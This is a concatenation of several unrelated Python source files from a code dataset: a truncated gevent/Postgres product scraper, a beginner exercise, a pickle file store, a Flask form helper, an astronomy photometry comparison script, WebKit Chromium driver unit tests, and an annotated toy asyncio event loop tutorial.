cursor.fetchone()[0]\n                                connection.commit()\n\n                                if product_id:\n                                    sql_string = \"\"\"\n                                        UPDATE \"page\"\n                                        SET \"is_done\" = TRUE\n                                        WHERE \"id\" = %s;\n                                    \"\"\"\n                                    parameters = (pk, )\n                                    result = cursor.execute(sql_string, parameters)\n\n                                    all_size = product['all_size']\n                                    active_size = product['active_size']\n                                    for size in product['all_size']:\n                                        if size in active_size:\n                                            available = True\n                                        else:\n                                            available = False\n                                        sql_string = \"\"\"\n                                            INSERT INTO \"size\" (\"product_id\", \"available\", \"value\")\n                                            VALUES (%s, %s, %s)\n                                            ON CONFLICT (value, product_id) DO UPDATE\n                                            SET\n                                                \"product_id\" = %s,\n                                                \"available\" = %s,\n                                                \"value\" = %s;\n                                        \"\"\"\n                                        parameters = ( product_id, available, size, product_id, available, size,)\n                                        result = cursor.execute(sql_string, parameters)\n                                        connection.commit()\n\n        except Empty:\n            print('Worker #{} exited!'.format(n))\n\n    def main(self):\n        # TODO: join url with page_id in stream, split to parallel routines\n        with psycopg2.connect(dbname=self.POSTGRES_DB, user=self.POSTGRES_USER, password=self.POSTGRES_PASSWORD, host=self.POSTGRES_HOST, port=self.POSTGRES_PORT) as connection:\n            with connection.cursor() as cursor:\n                sql_string = \"\"\"\n                    SELECT\n                        \"url\",\n                        \"category_id\",\n                        \"id\"\n                    FROM \"page\"\n                    WHERE \"is_done\" = FALSE\n                    ORDER BY RANDOM()\n                    LIMIT {limit};\n                \"\"\".format(limit=self.worker_number*10)\n                cursor.execute(sql_string)\n                for row in cursor.fetchall():\n                    url = row[0]\n                    category_id = row[1]\n                    pk = row[2]\n                    self.tasks.put((url, category_id, pk,))\n\n    def run_parallel(self):\n        gevent.joinall([\n            gevent.spawn(self.main),\n            *[gevent.spawn(self.worker, n) for n in range(self.worker_number)],\n        ])\n\n    def test_loop(self):\n        try:\n            while True:\n                self.run_parallel()\n        except KeyboardInterrupt:\n            if self.driver:\n                self.driver.quit()\n        finally:\n            if self.driver:\n                self.driver.quit()\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"product/app/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":17044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165833296","text":"#greeting = input(\"Hello, possible pirate! What's the password? 
\")\n#if greeting in [\"Arrr!\"]:\n\t#print(\"Go away, pirate.\")\n#else:\n #print(\"Greetings, hater of pirates!\")\n\n#authors = {\n #\"Charles Dickens\": \"1870\",\n #\"William Thackeray\": \"1863\",\n #\"Anthony Trollope\": \"1882\",\n #\"Gerard Manley Hopkins\": \"1889\"\n#}\n#for author, date in authors.items():\n #print(author + \" died in \" + date)\n\n#year = int(input(\"Greetings! What is your year of origin? \"))\n\n#if year <= 1900:\n #print('Woah, that is the past!')\n#elif year > 1900 and year < 2020:\n #print(\"That is totally the present!\")\n#else:\n #print(\"Far out, that's the future!!\")\n\n#sentence = \"The quick brown fox jumped over the lazy dogs\"\n#longest = \"\"\n\n#words = sentence.split()\n\n#for word in words:\n #if len(word) > len(longest):\n #longest = word\n\n#print(\"The word '\" + longest + \"' is \", len(longest), \" characters long.\")\n\nyears = (100)\npopulation = [0,10]\nfor i in range(years):\n population.append(population[-1] + population[-2])\nprint(population)\n","sub_path":"exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11469504","text":"import pickle\r\nimport codecs\r\nimport os\r\nclass DataManagement:\r\n filename_now = \"\"\r\n files = []\r\n def insert_db(self, fileinfo):\r\n self.files = self.load()\r\n for file in self.files:\r\n if file[\"filename\"] == fileinfo[\"filename\"]:\r\n return -1\r\n else:\r\n self.files.append(fileinfo)\r\n with codecs.open(self.filename_now, \"wb\") as f:\r\n pickle.dump(self.files, f)\r\n return 1\r\n\r\n def save_db(self, fileinfoes):\r\n with codecs.open(self.filename_now, \"wb\") as f:\r\n pickle.dump(fileinfoes, f)\r\n\r\n def query_db(self, fpath=\"\"):\r\n self.files = self.load()\r\n if fpath:\r\n for i, file in enumerate(self.files):\r\n if file[\"filename\"] == fpath:\r\n return i\r\n else:\r\n return -1\r\n def load(self):\r\n pathname = self.filename_now\r\n if not (os.path.exists(pathname) and os.path.isfile(pathname)):\r\n with codecs.open(self.filename_now, \"wb\") as f:\r\n pickle.dump(self.files, f)\r\n with codecs.open(self.filename_now, \"rb\") as f:\r\n files = pickle.load(f)\r\n return files","sub_path":"FileVault/foo/DataManagement.py","file_name":"DataManagement.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"463103932","text":"\"\"\"Auxiliary functions for serving the web page.\n\"\"\"\n\nfrom flask import request\n\nfrom ...core.files import dirContents\n\n\ndef getFormData(web):\n \"\"\"Get form data.\n\n The TF browser user interacts with the web app by clicking and typing,\n as a result of which a HTML form gets filled in.\n This form as regularly submitted to the web server with a request\n for a new incarnation of the page: a response.\n\n The values that come with a request, must be peeled out of the form,\n and stored as logical values.\n\n Most of the data has a known function to the web server,\n but there is also a list of webapp dependent options.\n \"\"\"\n\n form = {}\n\n resetForm = request.form.get(\"resetForm\", \"\")\n form[\"resetForm\"] = resetForm\n\n form[\"sec0\"] = request.form.get(\"sec0\", \"\")\n form[\"sec1\"] = request.form.get(\"sec1\", \"\")\n form[\"sec2\"] = request.form.get(\"sec2\", \"\")\n form[\"annoset\"] = request.form.get(\"annoset\", \"\")\n form[\"rannoset\"] = request.form.get(\"rannoset\", \"\")\n 
form[\"dannoset\"] = request.form.get(\"dannoset\", \"\")\n form[\"freqsort\"] = request.form.get(\"freqsort\", \"\")\n form[\"kindsort\"] = request.form.get(\"kindsort\", \"\")\n form[\"etxtsort\"] = request.form.get(\"etxtsort\", \"\")\n form[\"sfind\"] = request.form.get(\"sfind\", \"\")\n activeEntity = request.form.get(\"activeentity\", \"\")\n form[\"activeentity\"] = int(activeEntity) if activeEntity else None\n form[\"efind\"] = request.form.get(\"efind\", \"\")\n tSelectStart = request.form.get(\"tselectstart\", \"\")\n form[\"tselectstart\"] = int(tSelectStart) if tSelectStart else None\n tSelectEnd = request.form.get(\"tselectend\", \"\")\n form[\"tselectend\"] = int(tSelectEnd) if tSelectEnd else None\n\n return form\n\n\ndef annoSets(annoDir):\n \"\"\"Get the existing annotation sets.\n\n Parameters\n ----------\n annoDir: string\n The directory under which the distinct annotation sets can be found.\n The names of these subdirectories are the names of the annotation sets.\n\n Returns\n -------\n set\n The annotation sets, sorted by name.\n \"\"\"\n return set(dirContents(annoDir)[1])\n","sub_path":"tf/browser/ner/servelib.py","file_name":"servelib.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"482032890","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nAuthors\n-------\nJohn Weaver \n\n\nAbout\n-----\nRun standard checks on the photometry\n\nKnown Issues\n------------\nNone\n\n\n\"\"\"\n\n# ------------------------------------------------------------------------------\n# Standard Packages\n# ------------------------------------------------------------------------------\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.io import ascii, fits\nfrom astropy.table import Table\nfrom astropy.coordinates import SkyCoord\nimport adv_tools as adv\nimport astro_tools as astr\nimport astropy.units as u \n\nfrom matplotlib.colors import LogNorm\nimport scipy.stats\n\n# ------------------------------------------------------------------------------\n# Additional Packages\n# ------------------------------------------------------------------------------\n\n\n\n# ------------------------------------------------------------------------------\n# Parameters\n# ------------------------------------------------------------------------------\nfname_cat= '/Volumes/WD4/Current/tractor_pipeline/data/catalogs/master_catalog.fits'\nout_dir= '/Users/jweaver/Projects/Current/COSMOS/tractor_pipeline/figures'\n\n\nfname_vcat = '../../data/external/SPLASH_SXDF_Mehta+_v1.6/SPLASH_SXDF_Mehta+_v1.6.fits'\n# ------------------------------------------------------------------------------\n# Declarations and Functions\n# ------------------------------------------------------------------------------\ncat = Table.read(fname_cat)\n\nvcat = Table.read(fname_vcat)\n\n# ------------------------------------------------------------------------------\n# Main Program\n# ------------------------------------------------------------------------------\n\n# Convert to magnitudes!\nflux_i = cat['hsc_i']\nflux_z = cat['hsc_z']\n\nvmag_i = vcat['MAG_AUTO_hsc_i']\nvmag_z = vcat['MAG_AUTO_hsc_z']\n\nmask = (flux_i != flux_i) & (flux_z != flux_z) | (flux_i < 0) | (flux_z < 0)\nflux_i = flux_i[~mask]\nflux_z = flux_z[~mask]\n\ncat = cat[~mask]\n\nzpt = 23.93\n\nmag_i = - 2.5 * np.log10(flux_i) + zpt\nmag_z = - 2.5 * np.log10(flux_z) + zpt\n\n\nplt.ioff()\n\n# Color-mag plot\ncol1 = mag_i\ncol2 = 
mag_z\n\nvcol1 = vmag_i\nvcol2 = vmag_z\n\nx, y = cat['x'], cat['y']\nvx, vy = vcat['X_IMAGE'], vcat['Y_IMAGE']\n\nz, vz = np.zeros(len(y)), np.zeros(len(vy))\n\ncoord = SkyCoord(x, y, z, unit='pixel', representation_type='cartesian')\nvcoord = SkyCoord(vx, vy, vz, unit='pixel', representation_type='cartesian')\n\nidx, _, sep = coord.match_to_catalog_3d(vcoord) \nsep = sep.value\n\nthresh = 1.5\ncount = np.sum(sep < thresh)\n\nfig, ax = plt.subplots()\nax.hist(sep, bins=np.arange(0, max(sep), 0.1))\nax.set_xlim(0, 10)\nax.axvline(thresh, linestyle='dotted', color='k')\nax.text(0.7, 0.85, f'N = {count}', transform=ax.transAxes)\nfig.savefig(os.path.join(out_dir, 'separation.png'))\n\nidx_near = sep < thresh\nvidx_near = idx[sep < thresh]\n\ncol1, col2 = col1[idx_near], col2[idx_near]\nvcol1, vcol2 = vcol1[vidx_near], vcol2[vidx_near]\n\nfig, ax = plt.subplots(ncols = 2, sharex=True, sharey=True)\nax[0].plot([0, 100], [0,100], c='grey', ls='dotted', zorder=-1)\nax[1].plot([0, 100], [0,100], c='grey', ls='dotted', zorder=-1)\nax[0].scatter(vcol1, col1, s=0.2, c='purple', alpha=0.2)\nax[0].text(0.1, 0.9, f'N = {len(col1)}', transform=ax[0].transAxes )\nax[1].scatter(vcol2, col2, s=0.2, c='purple', alpha=0.2)\n# ax[1].text(0.1, 0.9 )\n#ax[0].set(xlim=(16,29), ylim=(-5,5))\nax[0].set(xlim=(16,29), ylim=(16,29))\nax[0].set(xlabel='Mehta HSC i (AB)', ylabel='Tractor HSC i (AB)')\nax[1].set(xlabel='Mehta HSC z (AB)', ylabel='Tractor HSC z (AB)')\n\nfig.subplots_adjust(bottom=0.2)\n\nfig.savefig(os.path.join(out_dir, 'master_colcol.png'))\n\n\n# DIFF\n\nminmag, maxmag = 19, 27\nminy, maxy = -0.5, 0.5\n\ndiff1 = col1 - vcol1\ndiff2 = col2 - vcol2\n\ndef mean_confidence_interval(data, confidence=0.34):\n m = np.median(data)\n sdata = np.sort(data)\n hdata = sdata[sdata > m]\n ldata = sdata[sdata < m]\n n_hdata = len(hdata)\n n_ldata = len(ldata)\n hmax = hdata[(np.arange(n_hdata) / n_hdata) < confidence][-1]\n hmin = ldata[::-1][(np.arange(n_ldata) / n_ldata) < confidence][-1]\n return m, hmin, hmax\n\ndef running_med(X, Y, xrange, total_bins):\n bins = np.linspace(xrange[0], xrange[1], total_bins)\n delta = bins[1]-bins[0]\n idx = np.digitize(X,bins)\n foo = np.array([mean_confidence_interval(Y[idx==k]) for k in range(total_bins)])\n running_median, running_std = foo[:,0], np.array((foo[:,1], foo[:,2]))\n Nbins = np.array([np.sum(idx==k) for k in range(total_bins)])\n return Nbins, np.array(bins - delta/2.), running_median, running_std\n\ntotal_bins = 10\nNbins1, rbins1, rmed1, rstd1 = running_med(col1, diff1, xrange=(20, 26.5), total_bins = total_bins)\nNbins2, rbins2, rmed2, rstd2 = running_med(col2, diff2, xrange=(20, 26.5), total_bins = total_bins)\n\nrbins1, rmed1, rstd1 = rbins1[Nbins1 > 1], rmed1[Nbins1 > 1], rstd1[:, Nbins1 > 1]\nrbins2, rmed2, rstd2 = rbins2[Nbins2 > 1], rmed2[Nbins2 > 1], rstd2[:, Nbins2 > 1]\n\nfig, ax = plt.subplots(nrows = 2, sharex=True, sharey=True, figsize=(15, 10))\n\nxbins = np.linspace(minmag, maxmag, 150)\nybins = np.linspace(miny, maxy, int(150 * minmag/maxmag))\n\nopt = dict(bins=[xbins, ybins], range=[[minmag,maxmag], [miny, maxy]], zorder=-1, cmap='Blues', norm=LogNorm())\n\nax[0].axhline(0, linestyle='dashed', c='k')\ncax1 = ax[0].hist2d(col1, diff1, **opt)\nfig.colorbar(cax1[3], ax=ax[0])\nax[0].plot(rbins1, rmed1, c='orange')\nax[0].fill_between(rbins1, rstd1[0], rstd1[1], color='orange', alpha = 0.3)\n\n\nax[1].axhline(0, linestyle='dashed', c='k')\ncax2 = ax[1].hist2d(col2, diff2, **opt)\nfig.colorbar(cax2[3], ax=ax[1])\nax[1].plot(rbins2, rmed2, 
c='orange')\nax[1].fill_between(rbins2, rstd2[0], rstd2[1], color='orange', alpha = 0.3)\n\nax[0].set_xlim(minmag, maxmag)\nax[0].set_ylim(miny, maxy)\nax[0].text(0.05, 0.9, f'Confidence: 34%', transform=ax[0].transAxes)\n\nax[0].set(xlabel='Mehta HSC i (AB)', ylabel='Tractor - Mehta HSC i (AB)')\nax[1].set(xlabel='Mehta HSC z (AB)', ylabel='Tractor - Mehta HSC z (AB)')\n\nfig.subplots_adjust(right=1.1)\nfig.savefig(os.path.join(out_dir, 'master_diff.png'))\n\n\n\n# Number counts\nfig, ax = plt.subplots(nrows = 2, sharex = True, sharey=True)\nbins = np.arange(16, 29, 0.5)\nax[0].hist(mag_i, histtype='step', bins = bins, label = f'Tractor (N = {len(mag_z)})', density=True, color='royalblue', ls='solid')\nax[1].hist(mag_z, histtype='step', bins = bins, label = 'Tractor', density=True, color='orange', ls='solid')\nax[0].hist(vmag_i, histtype='step', bins = bins, label = f'Mehta (N = {len(vmag_i)})', density=True, color='royalblue', ls='dotted')\nax[1].hist(vmag_z, histtype='step', bins = bins, label = 'Mehta', density=True, color='orange', ls='dotted')\nax[1].set(xlim=(16, 29), ylim=(0,0.4), xlabel='Mag (AB)', ylabel=' Norm count' )\n\nax[0].text( 16.5, 0.32, 'HSC i')\nax[1].text( 16.5, 0.32, 'HSC z')\nax[0].legend(loc=3)\nax[1].legend(loc=3)\n\nfig.subplots_adjust(left = 0.1, bottom=0.2)\nfig.savefig(os.path.join(out_dir, 'master_numcount.png'))\n\n\nfig, ax = plt.subplots()\nax.plot((mag_i - mag_z)[mag_i > 27])\nfig.savefig(os.path.join(out_dir, 'check.pdf'))\n","sub_path":"src/visualization/checkphot.py","file_name":"checkphot.py","file_ext":"py","file_size_in_byte":7097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69323735","text":"# Copyright (C) 2010 Google Inc. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of Google Inc. nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport StringIO\nimport time\nimport unittest\n\nfrom webkitpy.common.system import logtesting\nfrom webkitpy.common.system.executive_mock import MockExecutive2\nfrom webkitpy.common.system.systemhost_mock import MockSystemHost\nfrom webkitpy.layout_tests.port.config_mock import MockConfig\nfrom webkitpy.thirdparty.mock import Mock\nfrom webkitpy.tool.mocktool import MockOptions\n\nimport chromium\nimport chromium_mac\n\nfrom webkitpy.layout_tests.port import chromium_port_testcase\nfrom webkitpy.layout_tests.port.driver import DriverInput\n\n\nclass ChromiumDriverTest(unittest.TestCase):\n def setUp(self):\n host = MockSystemHost()\n options = MockOptions(configuration='Release', additional_drt_flag=['--test-shell'])\n config = MockConfig(filesystem=host.filesystem, default_configuration='Release')\n self.port = chromium_mac.ChromiumMacPort(host, 'chromium-mac-snowleopard', options=options, config=config)\n self.driver = chromium.ChromiumDriver(self.port, worker_number=0, pixel_tests=True)\n\n def test_test_shell_command(self):\n expected_command = \"test.html 2 checksum\\n\"\n self.assertEqual(self.driver._test_shell_command(\"test.html\", 2, \"checksum\"), expected_command)\n\n def _assert_write_command_and_read_line(self, input=None, expected_line=None, expected_stdin=None, expected_crash=False):\n if not expected_stdin:\n if input:\n expected_stdin = input\n else:\n # We reset stdin, so we should expect stdin.getValue = \"\"\n expected_stdin = \"\"\n self.driver._proc.stdin = StringIO.StringIO()\n line, did_crash = self.driver._write_command_and_read_line(input)\n self.assertEqual(self.driver._proc.stdin.getvalue(), expected_stdin)\n self.assertEqual(line, expected_line)\n self.assertEqual(did_crash, expected_crash)\n\n def test_write_command_and_read_line(self):\n self.driver._proc = Mock() # FIXME: This should use a tighter mock.\n # Set up to read 3 lines before we get an IOError\n self.driver._proc.stdout = StringIO.StringIO(\"first\\nsecond\\nthird\\n\")\n\n unicode_input = u\"I \\u2661 Unicode\"\n utf8_input = unicode_input.encode(\"utf-8\")\n # Test unicode input conversion to utf-8\n self._assert_write_command_and_read_line(input=unicode_input, expected_stdin=utf8_input, expected_line=\"first\\n\")\n # Test str() input.\n self._assert_write_command_and_read_line(input=\"foo\", expected_line=\"second\\n\")\n # Test input=None\n self._assert_write_command_and_read_line(expected_line=\"third\\n\")\n # Test reading from a closed/empty stream.\n # reading from a StringIO does not raise IOError like a real file would, so raise IOError manually.\n def mock_readline():\n raise IOError\n self.driver._proc.stdout.readline = mock_readline\n self._assert_write_command_and_read_line(expected_crash=True)\n\n def test_crash_log(self):\n self.driver._proc = Mock()\n\n # Simulate a crash by having stdout close unexpectedly.\n def mock_readline():\n raise IOError\n self.driver._proc.stdout.readline = mock_readline\n self.driver._proc.pid = 1234\n\n 
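# stub the URI/driver-name/crash-log hooks that run_test() consults after a\n        # crash, so the assertions below only exercise the crash-reporting path\n        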
self.driver.test_to_uri = lambda test: 'mocktesturi'\n self.driver._port.driver_name = lambda: 'mockdriver'\n self.driver._port._get_crash_log = lambda name, pid, out, err, newer_than: 'mockcrashlog'\n driver_output = self.driver.run_test(DriverInput(test_name='some/test.html', timeout=1, image_hash=None, should_run_pixel_test=False))\n self.assertTrue(driver_output.crash)\n self.assertEqual(driver_output.crashed_process_name, 'mockdriver')\n self.assertEqual(driver_output.crashed_pid, 1234)\n self.assertEqual(driver_output.crash_log, 'mockcrashlog')\n\n def test_stop(self):\n self.pid = None\n self.wait_called = False\n self.driver._proc = Mock() # FIXME: This should use a tighter mock.\n self.driver._proc.pid = 1\n self.driver._proc.stdin = StringIO.StringIO()\n self.driver._proc.stdout = StringIO.StringIO()\n self.driver._proc.stderr = StringIO.StringIO()\n self.driver._proc.poll = lambda: None\n\n def fake_wait():\n self.assertTrue(self.pid is not None)\n self.wait_called = True\n\n self.driver._proc.wait = fake_wait\n\n class FakeExecutive(object):\n def kill_process(other, pid):\n self.pid = pid\n self.driver._proc.poll = lambda: 2\n\n self.driver._port._executive = FakeExecutive()\n self.driver.KILL_TIMEOUT_DEFAULT = 0.01\n self.driver.stop()\n self.assertTrue(self.wait_called)\n self.assertEquals(self.pid, 1)\n\n def test_two_drivers(self):\n\n class MockDriver(chromium.ChromiumDriver):\n def __init__(self, port):\n chromium.ChromiumDriver.__init__(self, port, worker_number=0, pixel_tests=False)\n\n def cmd_line(self, pixel_test, per_test_args):\n return 'python'\n\n # get_option is used to get the timeout (ms) for a process before we kill it.\n driver1 = MockDriver(self.port)\n driver1._start(False, [])\n driver2 = MockDriver(self.port)\n driver2._start(False, [])\n # It's possible for driver1 to timeout when stopping if it's sharing stdin with driver2.\n start_time = time.time()\n driver1.stop()\n driver2.stop()\n self.assertTrue(time.time() - start_time < 20)\n\n def test_stop_cleans_up_properly(self):\n self.driver._test_shell = False\n self.driver.start(True, [])\n last_tmpdir = self.port._filesystem.last_tmpdir\n self.assertNotEquals(last_tmpdir, None)\n self.driver.stop()\n self.assertFalse(self.port._filesystem.isdir(last_tmpdir))\n\n def test_two_starts_cleans_up_properly(self):\n # clone the WebKitDriverTest tests here since we override start() and stop()\n self.driver._test_shell = False\n self.driver.start(True, [])\n last_tmpdir = self.port._filesystem.last_tmpdir\n self.driver._start(True, [])\n self.assertFalse(self.port._filesystem.isdir(last_tmpdir))\n\n def test_expectations_dict(self):\n self.port._filesystem.write_text_file('/mock-checkout/LayoutTests/platform/chromium/TestExpectations', 'upstream')\n self.port._filesystem.write_text_file('/mock-checkout/Source/WebKit/chromium/webkit/tools/layout_tests/test_expectations.txt', 'downstream')\n self.assertEquals('\\n'.join(self.port.expectations_dict().values()), 'upstream\\ndownstream')\n\n self.port._filesystem.write_text_file(self.port.path_from_chromium_base('skia', 'skia_test_expectations.txt'), 'skia')\n self.assertEquals('\\n'.join(self.port.expectations_dict().values()), 'upstream\\nskia\\ndownstream')\n\n\nclass ChromiumPortLoggingTest(logtesting.LoggingTestCase):\n\n # FIXME: put this someplace more useful\n def test_check_sys_deps(self):\n port = chromium_port_testcase.ChromiumPortTestCase.TestLinuxPort()\n\n # Success\n port._executive = MockExecutive2(exit_code=0)\n 
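# a zero exit code from the mocked executive means the dependency check passes\n        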
self.assertTrue(port.check_sys_deps(needs_http=False))\n\n        # Failure\n        port._executive = MockExecutive2(exit_code=1,\n                                         output='testing output failure')\n        self.assertFalse(port.check_sys_deps(needs_http=False))\n        self.assertLog([\n            'ERROR: System dependencies check failed.\\n',\n            'ERROR: To override, invoke with --nocheck-sys-deps\\n',\n            'ERROR: \\n',\n            'ERROR: testing output failure\\n'])\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"WebKit-IFC/Tools/Scripts/webkitpy/layout_tests/port/chromium_unittest.py","file_name":"chromium_unittest.py","file_ext":"py","file_size_in_byte":9227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56513161","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nhttps://sohabr.net/habr/post/359018/\nDuplicating the material from the link above, with additional explanations.\n\nThis demonstrates some of the things that underlie asyncio - it sheds a little light on how\nasync / await works.\n\nKey ideas:\n\n1. async / await != asyncio; these concepts are simply used together most of the time.\nIn reality async / await are syntactic constructs of the language which under the hood generate the required\nprimitives, and it is those primitives that the asyncio module uses. In other words, async / await can be used on their own,\nwithout asyncio. This file shows what asyncio could look like from the inside, in a maximally simplified and schematic form.\n\n2. Loosely speaking, await can be viewed as yield from. There is some difference (in terms of restrictions),\nbut in meaning they are almost the same thing.\n\n3. The most important idea, which follows from the previous point: await does not block anything! It simply hands control\nover to some calling code (just like yield) and along with that passes instructions on how and when this coroutine should be woken up.\nI.e. await aiolib.some_io_request(data) should be read like this:\n * Make some some_io_request with the data\n * Do a kind of yield out of this coroutine, handing control back to the event loop together with an instruction\n   on when this coroutine needs to be woken up again.\n * I.e. the purpose of some_io_request is, optionally, to perform some i/o initialization and to prepare the instructions\n   for when the current coroutine should be woken up.\n\n4. async def turns an ordinary function into a coroutine and allows await to be used inside it.\n\n5. Differences between await and yield from: in the general case await can only accept an awaitable object,\n i.e. one that has __await__(). The three most common such objects are a coroutine, a task and a future.\n The difference is that yield from works with a plain generator, while await does not. In this code that is\n worked around by setting the CO_ITERABLE_COROUTINE flag on the generator (then await starts to accept the generator),\n but that is a hack.\n\n6. TODO: what must __await__ implement and return?\n\n\"\"\"\n\nimport datetime\nimport heapq\nimport types\nimport time\n\nclass Task:\n\n    \"\"\"Represents how long a coroutine must wait before resuming execution.\n\n    The comparison operators are implemented for use with heapq.\n    Unfortunately a two-element tuple does not work, because when the\n    datetime.datetime instances are equal, the coroutines get compared,\n    and since they have no methods implementing comparison operations,\n    an exception is raised.\n\n    Think of this class as a rough analogue of asyncio.Task/curio.Task.\n    \"\"\"\n\n    def __init__(self, wait_until, coro):\n        self.coro = coro\n        self.waiting_until = wait_until\n\n    def __eq__(self, other):\n        return self.waiting_until == other.waiting_until\n\n    def __lt__(self, other):\n        return self.waiting_until < other.waiting_until\n\n\nclass SleepingLoop:\n\n    \"\"\"An event loop focused on deferred execution of coroutines.\n\n    Think of this class as a rough analogue of asyncio.BaseEventLoop/curio.Kernel.\n    \"\"\"\n\n    def __init__(self, *coros):\n        self._new = coros\n        self._waiting = []\n\n    def run_until_complete(self):\n        # Start all the coroutines.\n        for coro in self._new:\n            # Here every coroutine is advanced in turn until it hits a yield,\n            # i.e. an await in this case. After it suspends, push the coroutine onto the waiting queue\n            wait_until = coro.send(None)\n            heapq.heappush(self._waiting, Task(wait_until, coro))\n\n        # Keep going as long as there are coroutines still running.\n        while self._waiting:\n            now = datetime.datetime.now()\n\n            # Get the coroutine with the earliest resume time.\n            # In this example it is just a priority queue - who has to be woken up first\n            # Real asyncio is, of course, more complex\n            task = heapq.heappop(self._waiting)\n\n            if now < task.waiting_until:\n                # We got here earlier than needed,\n                # so wait until it is time to resume the coroutine.\n                delta = task.waiting_until - now\n                time.sleep(delta.total_seconds())\n                now = datetime.datetime.now()\n\n            # Time to resume the coroutine.\n            try:\n                # advance the coroutine - until we hit the next await\n                # (i.e. yield) which hands us a new wait_until\n                wait_until = task.coro.send(now)\n                heapq.heappush(self._waiting, Task(wait_until, task.coro))\n            except StopIteration:\n                # The coroutine has finished - there are no more awaits (in other words, yields) in it\n                pass\n\n\n# Without the decorator, sleep would return an ordinary Python generator (because of the yield inside),\n# and the @types.coroutine decorator sets a flag on this generator saying it is also a coroutine (CO_ITERABLE_COROUTINE).\n# The type does not change - sleep(N) still returns a generator, but one that can work with await,\n# because of the flag\n@types.coroutine\ndef sleep(seconds):\n    \"\"\"Suspends a coroutine for the given number of seconds.\n\n    Think of this as a rough analogue of asyncio.sleep()/curio.sleep().\n    \"\"\"\n    now = datetime.datetime.now()\n    wait_until = now + datetime.timedelta(seconds=seconds)\n    # Suspend all the coroutines in the current stack. Here we have to\n    # use ```yield``` to create a generator-based coroutine,\n    # not an ```async```-based one.\n\n    # actual arrives here from the line above: wait_until = task.coro.send(now)\n    actual = yield wait_until\n\n    # Resume the execution stack, returning the time\n    # we spent waiting.\n    return actual - now\n\n\n# If you remove async here, you get the error 'await' outside async function\n# But if you put yield from instead of await - everything works fine\n# I.e. async here is just a syntactic thing that lets await be used instead of yield from\nasync def countdown(label, length, *, delay=0): # returns a coroutine because of async def\n    \"\"\"\n    Starts a countdown of ```length``` seconds with a delay of ```delay```.\n    This is usually the part that the user implements.\n    \"\"\"\n    print(label, 'waiting', delay, 'seconds before starting countdown')\n\n    \"\"\"\n    All the magic is contained in the line delta = await sleep(delay). A few points here:\n\n    1. sleep is formally not an awaitable, it is an ordinary generator, but it carries the flag\n    CO_ITERABLE_COROUTINE (see the decorator above it), so under the hood the await here turns into\n    yield from sleep(delay)\n\n    2. The most interesting part is that we are not waiting for anything here, we simply return control\n    to the event queue, which will itself manage all the waiting.\n    If you look at this as yield from sleep(delay), it becomes clear that here we returned wait_until -\n    the point in time until which this coroutine must be suspended.\n    \"\"\"\n    delta = await sleep(delay)\n\n    print(label, 'starting after waiting', delta)\n    while length:\n        print(label, 'T-minus', length)\n        waited = await sleep(1)\n        length -= 1\n    print(label, 'lift-off!')\n\n\ndef main():\n    \"\"\"Run the event loop with countdowns on 3 separate timers.\n\n    This is usually the part that the user implements.\n    \"\"\"\n\n    loop = SleepingLoop(\n        countdown('A', 5),\n        countdown('B', 3, delay=2),\n        countdown('C', 4, delay=1),\n    )\n    start = datetime.datetime.now()\n    loop.run_until_complete()\n    print('Total elapsed time is', datetime.datetime.now() - start)\n\n\nif __name__ == '__main__':\n    main()\n\n\n\"\"\"\nA waiting 0 seconds before starting countdown\nB waiting 2 seconds before starting countdown\nC waiting 1 seconds before starting countdown\nA starting after waiting 0:00:00.000047\nA T-minus 5\nC starting after waiting 0:00:01.001220\nC T-minus 4\nA T-minus 4\nB starting after waiting 0:00:02.001018\nB T-minus 3\nC T-minus 3\nA T-minus 3\nB T-minus 2\nC T-minus 2\nA T-minus 2\nB T-minus 1\nC T-minus 1\nA T-minus 1\nB lift-off!\nC lift-off!\nA lift-off!\nTotal elapsed time is 